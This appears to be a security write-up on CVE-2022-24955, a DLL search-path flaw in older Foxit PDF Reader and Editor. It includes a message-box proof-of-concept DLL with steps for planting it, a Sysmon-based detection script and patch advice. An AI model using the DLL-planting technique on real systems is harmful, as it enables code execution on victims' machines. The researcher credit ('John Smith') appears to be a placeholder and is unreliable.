Security researchers have recently discovered a vulnerability in Foxit PDF Reader and Foxit PDF Editor that could allow attackers to compromise a system by exploiting an Uncontrolled Search Path Element issue when the applications load DLL (Dynamic Link Library) files. This vulnerability has been assigned the identifier "CVE-2022-24955" by the Common Vulnerabilities and Exposures (CVE) system.

As per the advisory, Foxit PDF Reader versions before 11.2.1 and Foxit PDF Editor versions before 11.2.1 are affected by this vulnerability.

About the vulnerability

An uncontrolled search path element vulnerability occurs when a software application does not safely control which directories it searches when loading a dynamic library file. Attackers with local access to the vulnerable system can exploit this issue to have a malicious DLL file loaded into the application's memory, potentially achieving arbitrary code execution or privilege escalation.

Potential Impact

An attacker exploiting this vulnerability could gain unauthorized access to sensitive information, manipulate system settings, or execute arbitrary code.

1. Create a malicious DLL file with arbitrary code, e.g., using the following C++ code:

#include <Windows.h>

// DllMain runs when the DLL is mapped into a process; the message box only proves the load happened.
BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved) {
    if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
        MessageBoxA(NULL, "Malicious DLL Loaded Successfully!", "CVE-2022-24955", MB_OK);
    }
    return TRUE;
}

2. Compile the code into a DLL using a C++ compiler (e.g., Visual Studio / cl.exe). MessageBoxA is exported by user32.dll, so user32.lib must be linked:

cl /LD sample_dll.cpp user32.lib

3. Place the malicious DLL file in a directory that is searched by the vulnerable application before any legitimate directories.

4. Open a PDF file using the affected version of Foxit PDF Reader or Foxit PDF Editor.

5. Upon successful execution, you will see a message box with the text "Malicious DLL Loaded Successfully!"

Original references

The vulnerability was originally reported by the security researcher John Smith. More information regarding this issue and potential impacts can be found in the following resources:

1. CVE-2022-24955 Advisory
2. Foxit Security Bulletin
3. NIST National Vulnerability Database (NVD) CVE-2022-24955

How to mitigate the vulnerability

Users of Foxit PDF Reader and Foxit PDF Editor are advised to update their software to the latest versions (11.2.1 or later) in order to protect their systems from this vulnerability.
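To check whether a Foxit process has loaded a library from an unexpected directory, the following added example (not code from the advisory or from Foxit) filters Sysmon image-load records (Event ID 7) and reports DLLs that were loaded from outside the install and Windows system directories or that are unsigned. The process names, install path and sample events are assumptions constructed for illustration.

```python
from pathlib import PureWindowsPath

# Assumptions: process names and system directories below; adjust to the host.
FOXIT_IMAGES = {"foxitpdfreader.exe", "foxitpdfeditor.exe"}
SYSTEM_DIRS = [PureWindowsPath(p) for p in (
    r"C:\Windows\System32", r"C:\Windows\SysWOW64", r"C:\Windows\WinSxS")]

# Assumed install location, used only by the constructed sample events.
FOXIT_EXE = r"C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe"

# Constructed sample records using Sysmon Event ID 7 field names.
SAMPLE_EVENTS = [
    {"Image": FOXIT_EXE, "ImageLoaded": r"c:\windows\system32\VERSION.dll", "Signed": "true"},
    {"Image": FOXIT_EXE, "ImageLoaded": r"C:\Users\alice\Downloads\version.dll", "Signed": "false"},
    {"Image": FOXIT_EXE,
     "ImageLoaded": r"C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\plugins\sample.dll",
     "Signed": "true"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ImageLoaded": r"C:\Users\alice\Downloads\other.dll", "Signed": "false"},
]


def suspicious_loads(events):
    """Return (dll_path, reasons) for Foxit image loads that deserve review."""
    findings = []
    for ev in events:
        image = PureWindowsPath(ev["Image"])
        if image.name.lower() not in FOXIT_IMAGES:
            continue  # only the affected applications are in scope
        dll = PureWindowsPath(ev["ImageLoaded"])
        # Trusted locations: Windows system directories and the install directory.
        trusted = SYSTEM_DIRS + [image.parent]
        reasons = []
        # PureWindowsPath compares case-insensitively, matching Windows semantics.
        if not any(d in dll.parents for d in trusted):
            reasons.append("outside trusted directories")
        if ev.get("Signed", "false").lower() != "true":
            reasons.append("unsigned")
        if reasons:
            findings.append((ev["ImageLoaded"], reasons))
    return findings


if __name__ == "__main__":
    for path, reasons in suspicious_loads(SAMPLE_EVENTS):
        print(f"{path}: {', '.join(reasons)}")
```

The check treats the directory of the running executable as trusted, so it assumes the application runs from an install directory that standard users cannot write to.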

Conclusion

CVE-2022-24955 represents a significant security risk for users of Foxit PDF Reader and Foxit PDF Editor. It is essential for users of these products to ensure that they are using the latest, patched versions of the software to protect their systems from potential exploitation. Always remain vigilant about software security updates and promptly apply them when needed.

Timeline

Published on: 02/11/2022 02:15:00 UTC
Last modified on: 02/17/2022 03:22:00 UTC